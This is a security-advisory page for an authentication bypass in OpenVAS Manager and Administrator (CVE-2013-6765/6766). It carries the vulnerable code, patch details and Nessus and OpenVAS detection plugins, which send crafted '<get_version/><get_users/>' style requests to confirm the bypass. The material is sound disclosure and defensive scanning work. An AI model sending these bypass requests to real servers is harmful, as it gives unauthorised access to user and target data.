[OVSA20131108] OpenVAS Manager And OpenVAS Administrator Vulnerable To Partial Authentication Bypass
2013-12-09T00:00:00
ID SECURITYVULNS:DOC:30085 Type securityvulns Reporter Securityvulns Modified 2013-12-09T00:00:00
Description
Summary
It has been identified that OpenVAS Manager and OpenVAS Administrator are
vulnerable to authentication bypass due to an incorrect state assignment when
processing OMP and OAP requests. It has been identified that this
vulnerability may allow unauthorised access to OpenVAS Manager and OpenVAS
Administrator on vulnerable systems. CVE-2013-6765 has been assigned to this
vulnerability in Manager and CVE-2013-6766 to the same vulnerability in
Administrator.
It should be noted that not all of the newly available commands are functional
and that exploitation typically requires SSH access to the host on which the
services are installed.
Current Status
As of the 8th November, the state of the vulnerabilities is believed
to be as follows. Patches have been supplied by Greenbone Networks which
it successfully resolves this vulnerability. New releases of both OpenVAS
Manager and OpenVAS Administrator have also been created which incorporate
these patches.
Thanks
OpenVAS would like to thank Antonio Sanchez Arago for his help in reporting
the vulnerability and apologise to all concerned for the substantial delay
in triaging his report.
-- Tim Brown <mailto:timb@openvas.org> <http://www.openvas.org>
OVSA20131108.txt
OpenVAS Security Advisory (OVSA20131108)
Date: 8th November 2013
Product: OpenVAS Manager < 3.0.7 and < 4.0.4 and OpenVAS Administrator < 1.2.2 and < 1.3.2
Vendor: OpenVAS <http://www.openvas.org/>
Risk: Low
Summary
It has been identified that OpenVAS Manager and OpenVAS Administrator are
vulnerable to authentication bypass due to an incorrect state assignment when
processing OMP and OAP requests. It has been identified that this
vulnerability may allow unauthorised access to OpenVAS Manager and OpenVAS
Administrator on vulnerable systems. CVE-2013-6765 has been assigned to this
vulnerability in Manager and CVE-2013-6766 to the same vulnerability in
Administrator.
Current Status
As of the 8th November, the state of the vulnerabilities is believed
to be as follows. Patches have been supplied by Greenbone Networks which
it successfully resolves this vulnerability. New releases of both OpenVAS
Manager and OpenVAS Administrator have also been created which incorporate
these patches.
Technical Details
It has been identified that OpenVAS Manager and OpenVAS Administrator are
vulnerable to authentication bypass due to an invalid state assignment when
processing OMP and OAP requests.
Upon processing an OMP and OAP request to retrieve the version information
from OpenVAS Administrator and OpenVAS Manager, the state is incorrectly set
to CLIENT_AUTHENTIC, allowing additional OMP and OAP commands to be called.
This can be seen in the omp_xml_handle_end_element() function from omp.c (for
OpenVAS Manager):
if (client_state)
set_client_state (CLIENT_AUTHENTIC);
else
set_client_state (CLIENT_TOP);
break;
In this instance, the first condition will always hold. Rather, the check
should be whether client_state is currently set to CLIENT_GET_VERSION_AUTHENTIC.
It should be noted that not all of the newly available commands are functional,
since they often rely upon additional session state information being present
which will not be the case where the authentication has been bypassed.
Furthermore, the vulnerable code path is typically only accessible to users
who have logged into a host running OpenVAS Manager or OpenVAS Administrator
via SSH as the affected services are typically only bound to localhost.
Fix
OpenVAS recommends that the publicly available patches are applied. If
building from source, then patches r18285 (for OpenVAS Administrator 1.2.x) or
r18281 (for Administrator 1.3.x) and r18276 (for OpenVAS Manager 3.0.x) or
r18271 (for Manager 4.0.x) should be obtained from the OpenVAS SVN repository.
A fresh tarball containing the latest stable release of Administrator
can be obtained from:
In the event that OpenVAS has been supplied as part of a distribution then
the vendor or organisation concerned should be contacted for a patch. Known
major distributors of OpenVAS precompiled packages have already been notified.
History
On the 3rd August 2013, Antonio Sanchez Arago initially attempted to contact the
OpenVAS security team to report the issue in OpenVAS Manager however it was
missed as many of the team were on annual leave.
Unfortunately, it was not picked up until Antonio attempted to contact us again
on in late October. On this occasion, it was picked up and the team were able
to reproduce the vulnerability.
On the 7th November, we contacted Antonio to confirm that the team had
successfully reproduced the issue and Greenbone Networks to notify them of the
vulnerability and request assistance in coordinating the disclosure. Major
distributors of OpenVAS precompiled packages were also notified about the
upcoming patches.
New versions of both OpenVAS Manager and OpenVAS Administrator were released on
the 8th.
The OpenVAS security team then contacted MITRE and on the 9th November,
CVE-2013-6764 and CVE-2013-6766 were assigned for this vulnerability.
Thanks
OpenVAS would like to thank Antonio Sanchez Arago for his help in reporting
the vulnerability and apologise to all concerned for the substantial delay
in triaging his report.
{"id": "SECURITYVULNS:DOC:30085", "bulletinFamily": "software", "title": "[OVSA20131108] OpenVAS Manager And OpenVAS Administrator Vulnerable To Partial Authentication Bypass", "description": "\r\n\r\nSummary\r\n\r\nIt has been identified that OpenVAS Manager and OpenVAS Administrator are\r\nvulnerable to authentication bypass due to an incorrect state assignment when\r\nprocessing OMP and OAP requests. It has been identified that this\r\nvulnerability may allow unauthorised access to OpenVAS Manager and OpenVAS\r\nAdministrator on vulnerable systems. CVE-2013-6765 has been assigned to this\r\nvulnerability in Manager and CVE-2013-6766 to the same vulnerability in\r\nAdministrator.\r\n\r\nIt should be noted that not all of the newly available commands are functional\r\nand that exploitation typically requires SSH access to the host on which the \r\nservices are installed.\r\n\r\nCurrent Status\r\n\r\nAs of the 8th November, the state of the vulnerabilities is believed\r\nto be as follows. Patches have been supplied by Greenbone Networks which\r\nit successfully resolves this vulnerability. New releases of both OpenVAS\r\nManager and OpenVAS Administrator have also been created which incorporate\r\nthese patches.\r\n\r\nThanks\r\n\r\nOpenVAS would like to thank Antonio Sanchez Arago for his help in reporting\r\nthe vulnerability and apologise to all concerned for the substantial delay\r\nin triaging his report.\r\n-- Tim Brown <mailto:timb@openvas.org> <http://www.openvas.org>\r\n\r\n\r\nOVSA20131108.txt\r\n\r\nOpenVAS Security Advisory (OVSA20131108)\r\nDate: 8th November 2013\r\nProduct: OpenVAS Manager < 3.0.7 and < 4.0.4 and OpenVAS Administrator < 1.2.2 and < 1.3.2\r\nVendor: OpenVAS <http://www.openvas.org/>\r\nRisk: Low\r\n\r\nSummary\r\n\r\nIt has been identified that OpenVAS Manager and OpenVAS Administrator are\r\nvulnerable to authentication bypass due to an incorrect state assignment when\r\nprocessing OMP and OAP requests. It has been identified that this\r\nvulnerability may allow unauthorised access to OpenVAS Manager and OpenVAS\r\nAdministrator on vulnerable systems. CVE-2013-6765 has been assigned to this\r\nvulnerability in Manager and CVE-2013-6766 to the same vulnerability in\r\nAdministrator.\r\n\r\nCurrent Status\r\n\r\nAs of the 8th November, the state of the vulnerabilities is believed\r\nto be as follows. Patches have been supplied by Greenbone Networks which\r\nit successfully resolves this vulnerability. New releases of both OpenVAS\r\nManager and OpenVAS Administrator have also been created which incorporate\r\nthese patches.\r\n\r\nTechnical Details\r\n\r\nIt has been identified that OpenVAS Manager and OpenVAS Administrator are\r\nvulnerable to authentication bypass due to an invalid state assignment when\r\nprocessing OMP and OAP requests.\r\n\r\nUpon processing an OMP and OAP request to retrieve the version information\r\nfrom OpenVAS Administrator and OpenVAS Manager, the state is incorrectly set\r\nto CLIENT_AUTHENTIC, allowing additional OMP and OAP commands to be called. \r\nThis can be seen in the omp_xml_handle_end_element() function from omp.c (for\r\nOpenVAS Manager):\r\n\r\nif (client_state)\r\n set_client_state (CLIENT_AUTHENTIC);\r\nelse\r\n set_client_state (CLIENT_TOP);\r\nbreak;\r\n\r\nIn this instance, the first condition will always hold. Rather, the check\r\nshould be whether client_state is currently set to CLIENT_GET_VERSION_AUTHENTIC.\r\n \r\nIt should be noted that not all of the newly available commands are functional, \r\nsince they often rely upon additional session state information being present\r\nwhich will not be the case where the authentication has been bypassed.\r\n\r\nFurthermore, the vulnerable code path is typically only accessible to users\r\nwho have logged into a host running OpenVAS Manager or OpenVAS Administrator\r\nvia SSH as the affected services are typically only bound to localhost.\r\n\r\nFix\r\n\r\nOpenVAS recommends that the publicly available patches are applied. If\r\nbuilding from source, then patches r18285 (for OpenVAS Administrator 1.2.x) or\r\nr18281 (for Administrator 1.3.x) and r18276 (for OpenVAS Manager 3.0.x) or\r\nr18271 (for Manager 4.0.x) should be obtained from the OpenVAS SVN repository.\r\n\r\nA fresh tarball containing the latest stable release of Administrator\r\ncan be obtained from:\r\n\r\n* http://wald.intevation.org/frs/download.php/1442/openvas-administrator-1.3.2.tar.gz\r\n\r\nA fresh tarball containing the latest stable release of Manager\r\ncan be obtained from:\r\n\r\n* http://wald.intevation.org/frs/download.php/1434/openvas-manager-4.0.4.tar.gz\r\n\r\nIn the event that OpenVAS has been supplied as part of a distribution then\r\nthe vendor or organisation concerned should be contacted for a patch. Known\r\nmajor distributors of OpenVAS precompiled packages have already been notified.\r\n\r\nHistory\r\n\r\nOn the 3rd August 2013, Antonio Sanchez Arago initially attempted to contact the\r\nOpenVAS security team to report the issue in OpenVAS Manager however it was\r\nmissed as many of the team were on annual leave.\r\n\r\nUnfortunately, it was not picked up until Antonio attempted to contact us again\r\non in late October. On this occasion, it was picked up and the team were able\r\nto reproduce the vulnerability.\r\n\r\nOn the 7th November, we contacted Antonio to confirm that the team had\r\nsuccessfully reproduced the issue and Greenbone Networks to notify them of the\r\nvulnerability and request assistance in coordinating the disclosure. Major\r\ndistributors of OpenVAS precompiled packages were also notified about the \r\nupcoming patches.\r\n\r\nNew versions of both OpenVAS Manager and OpenVAS Administrator were released on\r\nthe 8th.\r\n\r\nThe OpenVAS security team then contacted MITRE and on the 9th November,\r\nCVE-2013-6764 and CVE-2013-6766 were assigned for this vulnerability.\r\n\r\nThanks\r\n\r\nOpenVAS would like to thank Antonio Sanchez Arago for his help in reporting\r\nthe vulnerability and apologise to all concerned for the substantial delay\r\nin triaging his report.\r\n\r\n", "published": "2013-12-09T00:00:00", "modified": "2013-12-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30085", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2013-6764", "CVE-2013-6765", "CVE-2013-6766"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:49", "edition": 1, "viewCount": 15, "enchantments": {"score": {"value": 7.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-6764", "CVE-2013-6765", "CVE-2013-6766"]}, {"type": "exploitdb", "idList": ["EDB-ID:34026"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2D2D48F68F9CEE070A2756D39113B224"]}, {"type": "nessus", "idList": ["OPENVAS_MANAGER_ADMINISTRATOR_AUTH_BYPASS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103827", "OPENVAS:1361412562310103828", "OPENVAS:1361412562310103832"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13447"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-6765", "UB:CVE-2013-6766"]}, {"type": "zdt", "idList": ["1337DAY-ID-22456"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-6764", "CVE-2013-6765", "CVE-2013-6766"]}, {"type": "exploitdb", "idList": ["EDB-ID:34026"]}, {"type": "nessus", "idList": ["OPENVAS_MANAGER_ADMINISTRATOR_AUTH_BYPASS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103827"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13447"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-6765"]}, {"type": "zdt", "idList": ["1337DAY-ID-22456"]}]}, "exploitation": null, "vulnersScore": 7.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"securityvulns": [{"lastseen": "2021-06-08T19:08:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-6765", "CVE-2013-6766"], "description": "Access to some commands is not authenticated.", "edition": 2, "modified": "2013-12-09T00:00:00", "published": "2013-12-09T00:00:00", "id": "SECURITYVULNS:VULN:13447", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13447", "title": "OpenVAS Manager / OpenVAS Administrator authentication bypass", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2022-04-12T15:54:31", "description": "Nessus was able to exploit an authentication bypass vulnerability by sending the 'get_version' command. Successful exploitation of this vulnerability could allow a remote attacker to take complete control of an OpenVAS install.", "cvss3": {"score": null, "vector": null}, "published": "2013-11-15T00:00:00", "type": "nessus", "title": "OpenVAS Administrator / Manager Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6765", "CVE-2013-6766"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:openvas:openvas_manager"], "id": "OPENVAS_MANAGER_ADMINISTRATOR_AUTH_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/70919", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70919);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-6765\", \"CVE-2013-6766\");\n script_bugtraq_id(63632, 63634);\n script_xref(name:\"EDB-ID\", value:\"34026\");\n\n script_name(english:\"OpenVAS Administrator / Manager Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a security scanner management service that\nis affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to exploit an authentication bypass vulnerability by\nsending the 'get_version' command. Successful exploitation of this\nvulnerability could allow a remote attacker to take complete control\nof an OpenVAS install.\");\n # http://lists.wald.intevation.org/pipermail/openvas-announce/2013-November/000157.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9eda0db5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Nov/79\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OpenVAS Manager 4.0.4 / 3.0.7 or higher, and OpenVAS\nAdministrator 1.3.2 / 1.2.2 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openvas:openvas_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openvas_manager_administrator_detect.nasl\");\n script_require_ports(\"Services/openvasmd\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfunction run_command(cmd, args, port, help_res, exit_on_fail)\n{\n local_var res, tag, item, soc, data;\n\n if (isnull(exit_on_fail)) exit_on_fail = FALSE;\n\n soc = open_sock_tcp(port);\n if (!soc)\n {\n if (exit_on_fail) audit(AUDIT_SOCK_FAIL, port);\n else return NULL;\n }\n\n if (isnull(args))\n args = '';\n\n if (toupper(cmd) >< help_res || isnull(help_res))\n {\n tag = '<get_version/><' + cmd + ' ' + args + '/>';\n\n send(socket:soc, data:tag);\n res = recv(socket:soc, length:10000, min:strlen(tag+'_response'));\n close(soc);\n\n if ('status_text=\"OK\"' >!< res || 'status=\"200\"' >!< res ||\n '</' + cmd + '_response>' >!< res || '<' + cmd + '_response' >!< res)\n return NULL;\n\n item = eregmatch(pattern: '<' + cmd + '_response[^>]*>',\n string: res);\n if (isnull(item) || isnull(item[0])) return NULL;\n\n data = strstr(res, item[0]);\n data -= item[0];\n data -= ('</' + cmd + '_response>');\n\n if (chomp(data) != '') return chomp(data);\n else return NULL;\n }\n else return NULL;\n}\n\ninteresting_commands =\nmake_list(\n 'get_system_reports',\n 'get_users',\n 'get_settings'\n);\n\ninteresting_command_args = make_array();\ninteresting_command_args['get_system_reports'] = 'brief=\"1\"';\n\nport = get_service(svc:\"openvasmd\", exit_on_fail:TRUE);\n\nif (!get_tcp_port_state(port))\n audit(AUDIT_PORT_CLOSED, port);\n\ninfo = run_command(cmd:'help', port:port, exit_on_fail:TRUE);\n\ncommand = 'HELP';\nif (info != '' && 'HELP' >< info && 'COMMANDS' >< info)\n{\n # run through some more interesting commands and see if we can\n # get something cool for the report\n foreach cmd (interesting_commands)\n {\n args = interesting_command_args[cmd];\n if (isnull(args)) args = '';\n\n res = run_command(cmd:cmd, args:args, port:port, help_res:info, exit_on_fail:FALSE);\n if (!isnull(res))\n {\n info = res;\n command = toupper(cmd);\n break;\n }\n }\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to bypass authentication and run the \"' + command + '\"' +\n '\\n' + 'command as an authenticated user.';\n if (report_verbosity > 1)\n report += ' Here is the command output :\\n\\n' + info;\n report += '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"OpenVAS Manager / Administrator\", port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:51:46", "description": "OpenVAS Administrator 1.2 before 1.2.2 and 1.3 before 1.3.2 allows remote\nattackers to bypass the OAP authentication restrictions and execute OAP\ncommands via a crafted OAP request for version information, which causes\nthe state to be set to CLIENT_AUTHENTIC.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | I do not know if we are affected; I assigned this to the openvas-server package to ensure it does not get lost.\n", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6766", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6766"], "modified": "2014-05-19T00:00:00", "id": "UB:CVE-2013-6766", "href": "https://ubuntu.com/security/CVE-2013-6766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:51:46", "description": "OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote\nattackers to bypass the OMP authentication restrictions and execute OMP\ncommands via a crafted OMP request for version information, which causes\nthe state to be set to CLIENT_AUTHENTIC, as demonstrated by the\nomp_xml_handle_end_element function in omp.c.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | I do not know if we are affected; I assigned this to the openvas-server package to ensure it does not get lost.\n", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6765", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6765"], "modified": "2014-05-19T00:00:00", "id": "UB:CVE-2013-6765", "href": "https://ubuntu.com/security/CVE-2013-6765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-06-08T23:43:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-6766"], "description": "The remote OpenVAS Administrator is prone to an authentication bypass.", "modified": "2020-06-04T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310103828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103828", "type": "openvas", "title": "OpenVAS Administrator Authentication Bypass", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenVAS Administrator Authentication Bypass\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openvas:openvas_administrator\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103828\");\n script_version(\"2020-06-04T11:48:22+0000\");\n script_cve_id(\"CVE-2013-6766\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:48:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 13:03:55 +0200 (Fri, 08 Nov 2013)\");\n script_name(\"OpenVAS Administrator Authentication Bypass\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_openvas_administrator_detect.nasl\", \"gb_greenbone_os_consolidation.nasl\");\n script_require_ports(\"Services/oap\", 9393);\n script_mandatory_keys(\"openvas_administrator/detected\");\n script_exclude_keys(\"greenbone/gos/detected\");\n\n script_xref(name:\"URL\", value:\"http://openvas.org/OVSA20131108.html\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain unauthorized access to the\n affected application and perform certain actions.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to bypass OAP authentication by sending a special crafted request.\");\n\n script_tag(name:\"insight\", value:\"A software bug in the server module 'OpenVAS Administrator' allowed to bypass the OAP\n authentication procedure. The attack vector is remotely available in case public OAP is enabled.\n In case of successful attack, the attacker gains partial rights to execute OAP commands.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.2.2 or 1.3.2.\");\n\n script_tag(name:\"summary\", value:\"The remote OpenVAS Administrator is prone to an authentication bypass.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"greenbone/gos/detected\" ) )\n exit( 0 ); # there is an extra nvt gb_gsm_manager_auth_bypass_11_13.nasl for the gsm\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nreq = \"<get_version/><get_users/>\";\nsend( socket:soc, data:req + '\\r\\n' );\nres = recv( socket:soc, length:1024 );\nclose( soc );\n\nif( \"get_users_response status\" >< res && \"<user>\" >< res ) {\n report = 'By sending the request \"' + req + '\" to the remote OAP service it was possible to bypass the authentication. Response:\\n\\n' + res;\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-08T23:43:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-6765"], "description": "The remote GSM Manager is prone to an authentication bypass.", "modified": "2020-06-04T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310103832", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103832", "type": "openvas", "title": "GSM Manager Authentication Bypass", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# GSM Manager Authentication Bypass\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openvas:openvas_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103832\");\n script_version(\"2020-06-04T11:48:22+0000\");\n script_cve_id(\"CVE-2013-6765\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:48:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 13:02:55 +0200 (Fri, 08 Nov 2013)\");\n script_name(\"GSM Manager Authentication Bypass\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_openvas_manager_detect.nasl\", \"gb_greenbone_os_consolidation.nasl\");\n script_mandatory_keys(\"greenbone/gos/detected\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain unauthorized access to the\n affected application and perform certain actions.\");\n\n script_tag(name:\"vuldetect\", value:\"If public OMP is enabled, try to bypass OMP authentication by sending a special crafted request.\n If public OMP is not enabled, check the GOS version.\");\n\n script_tag(name:\"insight\", value:\"A software bug in the server module 'OpenVAS Manager' allowed to bypass the OMP\n authentication procedure. The attack vector is remotely available in case public OMP is enabled.\n In case of successful attack, the attacker gains partial rights to execute OMP commands. The bypass\n authentication is, however, incomplete and several OMP commands will fail to execute properly.\");\n\n script_tag(name:\"solution\", value:\"Upgrade at least to Greenbone OS 2.2.0-20.\");\n\n script_tag(name:\"summary\", value:\"The remote GSM Manager is prone to an authentication bypass.\");\n\n script_tag(name:\"affected\", value:\"Greenbone OS 2.2.0-1 up to 2.2.0-19 when public OMP is enabled.\");\n\n script_xref(name:\"URL\", value:\"https://www.greenbone.net/en/security-response-team/#toggle-id-6\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! get_kb_item( \"greenbone/gos/detected\" ) )\n exit( 0 );\n\n# public omp enabled\nif( port = get_app_port( cpe:CPE, service:\"omp_gmp\" ) ) {\n\n if( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\n soc = open_sock_tcp( port );\n if( ! soc )\n exit( 0 );\n\n req = \"<get_version/><get_targets/>\";\n send( socket:soc, data:req + '\\r\\n' );\n res = recv( socket:soc, length:1024 );\n close( soc );\n\n if( \"get_targets_response\" >< res && \"target id\" >< res ) {\n report = 'By sending the request \"' + req + '\" to the remote OMP service it was possible to bypass the authentication. Response:\\n\\n' + res;\n security_message( port:port, data:report );\n exit( 0 );\n }\n# public omp disabled\n} else {\n\n if( ! vers = get_kb_item( \"greenbone/gos/version\" ) )\n exit( 0 );\n\n vers = str_replace( string:vers, find:\"-\", replace:\".\" );\n\n if( version_is_less( version:vers, test_version:\"2.2.0.20\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.2.0-20\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-6765"], "description": "The remote OpenVAS Manager is prone to an authentication bypass.", "modified": "2019-02-26T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310103827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103827", "type": "openvas", "title": "OpenVAS Manager Authentication Bypass", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_openvas_manager_auth_bypass_11_13.nasl 13876 2019-02-26 12:04:06Z cfischer $\n#\n# OpenVAS Manager Authentication Bypass\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 